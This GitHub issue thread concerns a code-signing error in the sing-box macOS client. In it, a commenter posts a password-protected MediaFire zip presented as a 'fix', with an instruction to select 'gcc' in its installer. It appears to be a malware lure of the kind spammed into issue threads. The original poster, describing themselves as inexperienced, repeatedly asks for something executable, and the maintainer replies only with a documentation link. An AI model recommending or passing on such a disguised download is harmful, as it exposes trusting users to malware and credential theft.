### ISSUE TITLE
Invalid code signature or missing entitlements

### ISSUE THREAD

**Issue by snlike996** [SagerNet/sing-box#2067]
### Operating system

macOS

### System version

14.6

### Installation type

sing-box for macOS Graphical Client

### If you are using a graphical client, please provide the version of the client.

Version 1.9.3 (1)

### Description

![1](https://github.com/user-attachments/assets/2a0567cd-6d19-421d-92a8-32d00406bd92)
![2](https://github.com/user-attachments/assets/776308e0-ce75-40d7-b7a2-dff6b11e7999)
![3](https://github.com/user-attachments/assets/8f1291b6-38e4-4da0-b78b-a1d301101b16)

This morning, my software suddenly prompted that it needed to install a system extension, but when I clicked it, it prompted me Invalid code signature or missing entitlements. I don’t know how I should solve this problem!

### Reproduction

![1](https://github.com/user-attachments/assets/f8bf766e-28dc-4644-b089-d458289391b0)
![2](https://github.com/user-attachments/assets/6d9ae837-a8ca-44b8-b0bd-cc8093fc9f34)
![3](https://github.com/user-attachments/assets/b1e75780-ae59-43d3-938a-1f9b97d2d344)

### Supporter

- [ ] I am a [sponsor](https://github.com/sponsors/nekohasekai/)

### Integrity requirements

- [X] I confirm that I have read the documentation, understand the meaning of all the configuration items I wrote, and did not pile up seemingly useful options or default values.
- [X] I confirm that I have provided the server and client configuration files and process that can be reproduced locally, instead of a complicated client configuration file that has been stripped of sensitive data.
- [X] I confirm that I have provided the simplest configuration that can be used to reproduce the error I reported, instead of depending on remote servers, TUN, graphical interface clients, or other closed-source software.
- [X] I confirm that I have provided the complete configuration files and logs, rather than just providing parts I think are useful out of confidence in my own intelligence.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by snlike996** [comment]
> 下载 https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file 密码：changeme 在安装程序菜单中，选择“gcc”。

It looks very powerful, but I don’t know how to use it. I hope there is an executable code that can directly replace files or directly overwrite a certain directory. . . Because I am a programming idiot. . . .

**Comment by snlike996** [comment]
It looks very powerful, but I don’t know how to use it. I hope there is an executable code that can directly replace files or directly overwrite a certain directory. . . Because I am a programming idiot. . . .

> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

**Comment by snlike996** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

It looks very powerful, but I don’t know how to use it. I hope there is an executable code that can directly replace files or directly overwrite a certain directory. . . Because I am a programming idiot. . . .

**Comment by nekohasekai** [comment]
https://sing-box.sagernet.org/clients/apple/
